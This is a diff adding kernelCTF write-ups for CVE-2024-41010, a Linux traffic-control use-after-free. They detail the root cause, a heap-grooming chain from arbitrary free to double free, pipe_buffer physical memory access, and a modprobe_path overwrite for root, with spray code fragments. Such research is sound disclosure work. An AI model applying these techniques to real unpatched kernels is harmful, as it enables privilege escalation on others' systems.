google · 0xTen · Aug 21, 2024 · Aug 21, 2024 · Aug 21, 2024 · Aug 21, 2024
diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/exploit.md
@@ -0,0 +1,266 @@
+# CVE-2024-41010 Exploit
+
+## Root-cause
+Looking at the lifecycle of `tcx_entry`, we can see that it's first allocated when initializing a new ingress/clsact qdisc in `ingress_init` and similar functions:
+```c
+static int ingress_init(struct Qdisc *sch, struct nlattr *opt,
+			struct netlink_ext_ack *extack)
+{
+	struct ingress_sched_data *q = qdisc_priv(sch);
+	struct net_device *dev = qdisc_dev(sch);
+	struct bpf_mprog_entry *entry;
+	bool created;
+	int err;
+
+	if (sch->parent != TC_H_INGRESS)
+		return -EOPNOTSUPP;
+
+	net_inc_ingress_queue();
+
+	entry = tcx_entry_fetch_or_create(dev, true, &created); // [1]
+	if (!entry)
+		return -ENOMEM;
+	tcx_miniq_set_active(entry, true); // [2]
+	mini_qdisc_pair_init(&q->miniqp, sch, &tcx_entry(entry)->miniq); // [3]
+	if (created)
+		tcx_entry_update(dev, entry, true);
+
+	q->block_info.binder_type = FLOW_BLOCK_BINDER_TYPE_CLSACT_INGRESS;
+	q->block_info.chain_head_change = clsact_chain_head_change;
+	q->block_info.chain_head_change_priv = &q->miniqp; // [4]
+
+	err = tcf_block_get_ext(&q->block, sch, &q->block_info, extack);
+	if (err)
+		return err;
+
+	mini_qdisc_pair_block_init(&q->miniqp, q->block);
+
+	return 0;
+}
+```
+At [1], `tcx_entry_fetch_or_create` is called to either allocate or fetch an existing `tcx_entry` (wrapped by `bpf_mprog_entry`):
+```c
+static inline struct bpf_mprog_entry *
+tcx_entry_fetch_or_create(struct net_device *dev, bool ingress, bool *created)
+{
+	struct bpf_mprog_entry *entry = tcx_entry_fetch(dev, ingress); // [5]
+
+	*created = false;
+	if (!entry) {
+		entry = tcx_entry_create();
+		if (!entry)
+			return NULL;
+		*created = true;
+	}
+	return entry;
+}
+```
+At [2], `tcx_miniq_set_active` is called to set `tcx_entry->miniq_active` to `true`, then at [3], `&tcx_entry(entry)->miniq` (basically a pointer to the first field of `tcx_entry`) is stored at `&q->miniqp`, which is then copied to `q->block_info.chain_head_change_priv` at [4].
+If we now also look into the process of releasing an ingress qdisc we can notice something quite interesting:
+```c
+static void ingress_destroy(struct Qdisc *sch)
+{
+	struct ingress_sched_data *q = qdisc_priv(sch);
+	struct net_device *dev = qdisc_dev(sch);
+	struct bpf_mprog_entry *entry = rtnl_dereference(dev->tcx_ingress);
+
+	if (sch->parent != TC_H_INGRESS)
+		return;
+
+	tcf_block_put_ext(q->block, sch, &q->block_info);
+
+	if (entry) {
+		tcx_miniq_set_active(entry, false);
+		if (!tcx_entry_is_active(entry)) {
+			tcx_entry_update(dev, NULL, true);
+			tcx_entry_free(entry);
+		}
+	}
+
+	net_dec_ingress_queue();
+}
+```
+In `ingress_destroy`, if there is an existing `tcx_entry` bound to the net device, then it changes the `tcx_entry->miniq_active` bool to false, then calls `tcx_entry_is_active(entry)` to determine if `tcx_entry` is still in use, and if it's not, we remove the reference from the net device and free `tcx_entry`. Let's have a look at `tcx_entry_is_active` now:
+```c
+static inline bool tcx_entry_is_active(struct bpf_mprog_entry *entry)
+{
+	ASSERT_RTNL();
+	return bpf_mprog_total(entry) || tcx_entry(entry)->miniq_active;
+}
+```
+It checks if the entry either has any bpf programs currently attached to it since they will have a view of the entry or if the `miniq_active` bool is true, which would mean the qdisc view still exists, but since destroying the qdisc sets this to false, if we don't attach any programs, this will always return false and enter the free path.
+This raises the question of what could happen if another qdisc fetched the same entry and referenced it and then we deleted the first qdisc, causing the entry to be deleted as well. At this point it's probably worth noting that, in my understanding, you can't really have 2 ingress qdiscs co-exist in the same net device and creating a new one will make the old qdisc be deleted. However, interestingly enough, creating a new ingress qdisc will call `ingress_init()` for the new qdisc before ever calling `ingress_destroy()` for the old one, so the reference can get duplicated right before freeing `tcx_entry` by simply creating a ingress qdisc twice in a row. After the first qdisc gets deleted, the second one still has a pointer to `tcx_entry` in `q->block_info.chain_head_change_priv` which later can get dereferenced in the call to `mini_qdisc_pair_swap()` in the following call chain:
+```c
+[...]
+static void tcf_chain0_head_change(struct tcf_chain *chain,
+				   struct tcf_proto *tp_head)
+{
+	struct tcf_filter_chain_list_item *item;
+	struct tcf_block *block = chain->block;
+
+	if (chain->index)
+		return;
+
+	mutex_lock(&block->lock);
+	list_for_each_entry(item, &block->chain0.filter_chain_list, list)
+		tcf_chain_head_change_item(item, tp_head);
+	mutex_unlock(&block->lock);
+}
+[...]
+static void tcf_chain_head_change_item(struct tcf_filter_chain_list_item *item,
+				       struct tcf_proto *tp_head)
+{
+	if (item->chain_head_change)
+		item->chain_head_change(tp_head, item->chain_head_change_priv);
+}
+[...]
+static void clsact_chain_head_change(struct tcf_proto *tp_head, void *priv)
+{
+	struct mini_Qdisc_pair *miniqp = priv;
+
+	mini_qdisc_pair_swap(miniqp, tp_head);
+};
+```
+Which we can reach by adding or removing traffic control filters from this qdisc.
+
+## Triggering vulnerability
+- Create a new ingress/clsact qdisc
+- Create a second ingress/clasct qdisc, which will cause the following to happen:
+	- reuse tcx_entry reference
+	- delete tcx_entry
+	- delete first qdisc
+- add a filter to second qdisc which will dereference the dangling pointer and overwrite the first qword of the UAF object with a pointer to the qdisc struct or NULL
+
+The dangling pointer is dereferenced in the `mini_qdisc_pair_swap` function:
+```c
+void mini_qdisc_pair_swap(struct mini_Qdisc_pair *miniqp,
+			  struct tcf_proto *tp_head)
+{
+	/* Protected with chain0->filter_chain_lock.
+	 * Can't access chain directly because tp_head can be NULL.
+	 */
+	struct mini_Qdisc *miniq_old =
+		rcu_dereference_protected(*miniqp->p_miniq, 1); // [1]
+	struct mini_Qdisc *miniq;
+
+	if (!tp_head) {
+		RCU_INIT_POINTER(*miniqp->p_miniq, NULL); // [2]
+	} else {
+		miniq = miniq_old != &miniqp->miniq1 ?
+			&miniqp->miniq1 : &miniqp->miniq2;
+
+		/* We need to make sure that readers won't see the miniq
+		 * we are about to modify. So ensure that at least one RCU
+		 * grace period has elapsed since the miniq was made
+		 * inactive.
+		 */
+		if (IS_ENABLED(CONFIG_PREEMPT_RT))
+			cond_synchronize_rcu(miniq->rcu_state);
+		else if (!poll_state_synchronize_rcu(miniq->rcu_state))
+			synchronize_rcu_expedited();
+
+		miniq->filter_list = tp_head;
+		rcu_assign_pointer(*miniqp->p_miniq, miniq); // [3]
+	}
+
+	if (miniq_old)
+		/* This is counterpart of the rcu sync above. We need to
+		 * block potential new user of miniq_old until all readers
+		 * are not seeing it.
+		 */
+		miniq_old->rcu_state = start_poll_synchronize_rcu(); // [4]
+}
+```
+
+## Limited UAF
+Keep in mind that `miniqp` is the first field of `struct tcx_entry` and `miniq` is a field of `struct Qdisc`, so `miniqp->p_miniq` is a pointer to somewhere in the middle of a qdisc that gets stored at the start of a `struct tcx_entry`. Also, `tcx_entry` lives in kmalloc-2k.
+Notice that, at [2], if `tp_head` is NULL, it writes NULL to `miniqp->p_miniq`, which is at the start of `tcx_entry` and if `tp_head` is not NULL, it writes a pointer to `miniq` at [3], writing the pointer to the middle of a qdisc at the start of `tcx_entry`. We can control whether or not `tp_head` is NULL, so we could try to write NULL. An idea that might come to mind is targeting refcounts with the NULL write, however, there is a catch: at [1] it reads the original value at the first qword of the UAF object before being overwritten, and later at [4], if it's not NULL, it will get dereferenced as a pointer. So our options are limited to victim objects that either have NULL in the first qword or that already have a pointer in the first qword and would do something interesting if we overwrote it with either NULL or a different pointer.
+
+## Escalate to arbitrary free
+My approach was cross-caching from kmalloc-2k to kmalloc-cg-2k to get access to `msg_msgseg` objects and replace the `msg_msgseg->next` pointer with the `miniq` pointer. This is particularly interesting in our case given that the first field of `struct mini_Qdisc` is `filter_list`, which is a linked list of `struct tcf_proto` objects bound to filters we can allocate and free at will. Combine this with the fact that reading a `msg_msgseg` will free whatever if at `msg_msgseg->next` until it finds NULL and we have a very strong arbitrary free instrument.
+```c
+void free_msg(struct msg_msg *msg)
+{
+	struct msg_msgseg *seg;
+
+	security_msg_msg_free(msg);
+
+	seg = msg->next;
+	kfree(msg);
+	while (seg != NULL) {
+		struct msg_msgseg *tmp = seg->next;
+
+		cond_resched();
+		kfree(seg);
+		seg = tmp;
+	}
+}
+```
+This allow us to do the following:
+- make `tcx_entry` dangling
+- replace it with `msg_msgseg`
+- add a filter to qdisc (this will both add a `tcf_proto` to the linked list with head at `miniq` and write the `miniq` pointer at `msg_msgseg->next`)
+- read `msg_msgseg`, which will cause it to get freed and also interate over `filter_list`, freeing everything until it finds NULL, so it will free our `tcf_proto`, which lives at kmalloc-128.
+
+## Reaching for kmalloc-cg-1k
+The end goal of my exploit was to reach get a double free in kmalloc-cg-1k to overlap `pipe_buffer` with `skbuf->data` and win. In order to do that, I had to go through some intermediate steps in other caches though.
+
+### Getting a pointer to kmalloc-cg-512
+Once I had arbitrary free in kmalloc-128, I decided to once again cross-cache, this time from kmalloc-128 to kmalloc-cg-128 by spraying `msg_msgseg` and reusing our arbitrary free primitive to free a `msg_msgseg` object in kmalloc-cg-128. At this point my goal was to get some object that could give me a pointer to kmalloc-cg-1k so I could overlap our new, fully controllable, `msg_msgseg->next` with it. My first idea was to overlap it with a `msg_msg` object, however, this would end up linking the `msg_msgseg` into the circular `msg_msg` list, and cause a hang while freeing `msg_msgseg` because it would iterate endlessly. After going through some structs, I came across `struct in_ifaddr`:
+```c
+	struct hlist_node	hash;
+	struct in_ifaddr	__rcu *ifa_next;
+	struct in_device	*ifa_dev;
+	struct rcu_head		rcu_head;
+	__be32			ifa_local;
+	__be32			ifa_address;
+	__be32			ifa_mask;
+	__u32			ifa_rt_priority;
+	__be32			ifa_broadcast;
+	unsigned char		ifa_scope;
+	unsigned char		ifa_prefixlen;
+	unsigned char		ifa_proto;
+	__u32			ifa_flags;
+	char			ifa_label[IFNAMSIZ];
+
+	/* In seconds, relative to tstamp. Expiry is at tstamp + HZ * lft. */
+	__u32			ifa_valid_lft;
+	__u32			ifa_preferred_lft;
+	unsigned long		ifa_cstamp; /* created timestamp */
+	unsigned long		ifa_tstamp; /* updated timestamp */
+};
+```
+This is particularly interesting for mainly 2 reasons:
+- I can read the `ifa_dev` pointer, which will allow me to leak a pointer to a `struct in_device` object in kmalloc-512
+- When spraying, I can use the `ifa_address` field as an identifier, so I can know which sprayed object overlapped `msg_msgseg`
+A kmalloc-512 pointer is not what I wanted initially, but good enough. It's relatively easy to allocated kmalloc-cg-512 pages adjacent to kmalloc-512 pages because they belong to the same page order. With this in mind, I allocated a huge padding of kmalloc-cg-512 `skbuf->data` before allocating `in_device`, so when I receive the leak I simply subtract an arbitrary offset that should dislocate the pointer to somewhere in the middle of the `skbuf->data` spray.
+
+### kmalloc-cg-128 -> kmalloc-cg-512
+Now that we have a pointer to a `skbuf->data` object in kmalloc-cfg-512, we need to somehow write it to our controllable `msg_msgseg` in order to free it. While many handy data spray techniques seem to be dead by now, I ended up coming across a (seemly novel) object that could do the job.
+```c
+static int rtnl_alt_ifname(int cmd, struct net_device *dev, struct nlattr *attr,
+			   bool *changed, struct netlink_ext_ack *extack)
+{
+	char *alt_ifname;
+	size_t size;
+	int err;
+
+	err = nla_validate(attr, attr->nla_len, IFLA_MAX, ifla_policy, extack);
+[...]
+	alt_ifname = nla_strdup(attr, GFP_KERNEL_ACCOUNT);
+[...]
+	kfree(alt_ifname);
+	if (!err)
+		*changed = true;
+	return err;
+}
+``` 
+The `alt_ifname` object is a temporary buffer where user data is stored with an arbitrary size, allocated with `GFP_KERNEL_ACCOUNT`. Keep in mind that `rtnl_alt_ifname` is only called from contexts where the rtnl lock is acquired, so spawning multiple threads to race and spray the temporary buffer won't work, so we have to make sure the object we want to overwrite is first on the freelist.
+One way of doing this is incrementally allocating other `msg_msgseg` objects and checking our corrupted `msg_msgseg` using `MSG_COPY` to read it without freeing, allowing me to known which of the the new `msg_msgseg` objects just overlapped the target one, and then replace it with the `alt_ifname` buffer, finally allowing me to point `msg_msgseg->next` to a `skbuf->data` object in kmalloc-cg-512 and free it.
+
+### kmalloc-cg-512 -> kmalloc-cg-1k
+kmalloc-cg-512 is already much better than kmalloc-cg-128. We can now overlap a `msg_msg` with our `skbuf->data` object. If we send another message in the same queue as this `msg_msg` object, we'll get a pointer to the second message in the first qword of the first message, so by sending a message that gets allocated on kmalloc-cg-1k we can leak a pointer by reading our `skbuf->data`. If we now slightly increment the pointer, it will point to a different `msg_msg` allocated by our spray, which is owned by a different queue, so we now have a duplicated reference to a `msg_msg` in kmalloc-cg-1k that we can use to get double-free. Manipulating `msg_msg` in that fashion has been covered in detail here: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
+
+## pipe_buffer->page physical read/write > win
+Once we get to kmalloc-cg-1k we can overlap `skbuf->data` with `pipe_buffer` to control the `pipe_buffer->page` pointer to achieve physical read and write, this technique is thoroughly discussed in https://www.interruptlabs.co.uk/articles/pipe-buffer.
+Using this primitive, I overwrite the `modprobe_path` string to point it to a memory file created with `memfd_create`, under `/proc/<pid>/fd/<n>`. I also bruteforce the pid of the exploit process outside of the sandboxed namespace. This has all been very well described in https://pwning.tech/nftables/#4-techniques
diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/novel-techniques.md
@@ -0,0 +1,88 @@
+# Novel Techniques
+
+## kmalloc-2k groom/potential target object: `bpf_prog_aux`
+```c
+struct bpf_prog *bpf_prog_alloc_no_stats(unsigned int size, gfp_t gfp_extra_flags)
+{
+	gfp_t gfp_flags = bpf_memcg_flags(GFP_KERNEL | __GFP_ZERO | gfp_extra_flags);
+	struct bpf_prog_aux *aux;
+[...]
+	aux = kzalloc(sizeof(*aux), bpf_memcg_flags(GFP_KERNEL | gfp_extra_flags));
+[...]
+}
+```
+The `bpf_prog_aux` object gets allocated by the `bpf_prog_alloc_no_stats`.
+It can be allocated from userland by creating an empty bpf program:
+```c
+    struct bpf_insn insns[] = {
+        BPF_MOV64_IMM(BPF_REG_0, 4),
+        BPF_EXIT_INSN(),
+    };
+[...]
+    union bpf_attr prog_attr = {
+        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
+        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
+        .insns = (uint64_t)insns,
+        .license = (uint64_t) "GPL v2",
+        .log_level = 0,
+        .log_size = 0,
+        .log_buf = (uint64_t)0};
+
+[...]
+    /* defrag 2k slab (bpf_prog_aux) */
+    int progfd[SPRAY];
+    puts("[*] kmalloc-2k defrag");
+    for (int i = 0; i < 3 * SPRAY / 4; i++)
+    {
+        progfd[i] = bpf(BPF_PROG_LOAD, &prog_attr);
+        if (progfd[i] == -1)
+            errout("bpf(BPF_PROG_LOAD)");
+    }
+```
+
+It can be later freed by simply closing the bpf program's fd:
+```c
+    /* free slab containing tcx_entry (return it to buddy) */
+    printf("[*] cross-cache (kmalloc-2k -> kmalloc-cg-2k)\n");
+    for (int i = SPRAY / 2; i < SPRAY; i++)
+        close(progfd[i]);
+```
+
+This is useful for spraying and manipulating heap layout in kmalloc-2k and it's what I ended up using for holding kmalloc-2k slabs that I later return to the page allocator for my cross-cache. It's also worth noting that the first qword is a refcount to track the life time of the bpf program bound to it, which can make it an interesting target for exploitation, however I didn't end up using it for that purpose in my exploit for the reasons described in `exploit.md`, so I'm only mentioning this as a side note.
+
+## Arbitrary data spray object: `alt_ifname`
+```c
+static int rtnl_alt_ifname(int cmd, struct net_device *dev, struct nlattr *attr,
+			   bool *changed, struct netlink_ext_ack *extack)
+{
+	char *alt_ifname;
+	size_t size;
+	int err;
+
+	err = nla_validate(attr, attr->nla_len, IFLA_MAX, ifla_policy, extack);
+[...]
+	alt_ifname = nla_strdup(attr, GFP_KERNEL_ACCOUNT);
+[...]
+	kfree(alt_ifname);
+	if (!err)
+		*changed = true;
+	return err;
+}
+``` 
+The `alt_ifname` object is a temporary buffer where user data is stored with an arbitrary size, allocated with `GFP_KERNEL_ACCOUNT`. Keep in mind that `rtnl_alt_ifname` is only called from contexts where the rtnl lock is acquired, so spawning multiple threads to race and spray the temporary buffer won't work, so we have to make sure the object we want to overwrite is first on the freelist.
+
+## Cross-cache stabilization technique/trick
+```c
+    /* create cg-4k partial slabs to avoid disputing buddy pages with cg-2k */
+    puts("[*] kmalloc-cg-4k partial slabs");
+    for (int i = 0; i < SPRAY; i++)
+        msgsnd(frag4k[i], msg, 4096 - 48, 0);
+    for (int i = 8; i < SPRAY; i++)
+    {
+        if (!(i % 8))
+            continue;
+        if (msgrcv(frag4k[i], msg, 4096 - 48, MTYPE_PRIMARY, 0) < 0)
+            errout("msgrcv");
+    }
+```
+Further improve cross-cache stability by purposefully fragmenting other caches that I don't want to take the freed slab by creating several used slabs and leaving only 1 object left in each of them, creating several partial slabs with freelists that `kmalloc()` can chew on long before it starts asking for new pages. In my exploit, both `msg_msg` in kmalloc-cg-4k and `msg_msgseg` in kmalloc-cg-2k get allocated in the same path, but I want to make sure `msg_msgseg` takes the freed slab from the page allocator. To ensure that, not only I defrag kmalloc-cg-2k (common knowledge) but also frag kmalloc-cg-4k with partial slabs (novel to the best of my knowledge), which took the success rate of this specific step from less than 40% to succeeding the great majority of the time.